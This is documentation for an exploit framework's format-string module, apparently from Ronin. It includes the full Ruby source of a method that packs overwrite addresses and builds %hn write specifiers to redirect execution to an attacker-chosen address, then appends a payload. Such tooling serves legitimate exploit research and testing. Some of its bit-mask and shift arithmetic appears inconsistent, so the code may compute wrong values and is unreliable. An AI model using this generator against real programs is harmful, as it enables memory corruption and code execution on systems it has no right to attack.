Module: Ronin::Exploits::Mixins::FormatString

Includes:
Binary
Defined in:
lib/ronin/exploits/mixins/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Since:

  • 1.0.0

Instance Method Summary collapse

Methods included from Binary

#pack, #perform_validate, #platform

Instance Method Details

#build_format_string(overwrite:, pop_length:, address:, payload:) ⇒ String

Builds a format string.

Parameters:

  • overwrite (Integer)

    The address to overwrite.

  • pop_length (Integer)
  • address (Integer)

    The address to write.

  • payload (#to_s)

    The payload append to the format string.

Returns:

  • (String)

    The built format string.

Since:

  • 1.0.0



55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
 
# File 'lib/ronin/exploits/mixins/format_string.rb', line 55

def build_format_string(overwrite: , pop_length: , address: , payload: )
  machine_word = platform[:machine_word]

  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << pack(:machine_word,overwrite)
  buffer << pack(:machine_word,overwrite + (machine_word.size / 2))

  low_mask = 0xff

  (machine_word.size / 2).times do
    low_mask <<= 8
    low_mask |= 0xff
  end

  high_mask = low_mask << ((machine_word.size * 8) / 2)

  high = (address & high_mask) >> (machine_word.size / 2)
  low  = address & low_mask

  if low < high
    low    -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,pop_length,high - low,pop_length + 1)
  else
    high   -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,pop_length + 1,low - high,pop_length)
  end

  buffer << payload.to_s
  return buffer
end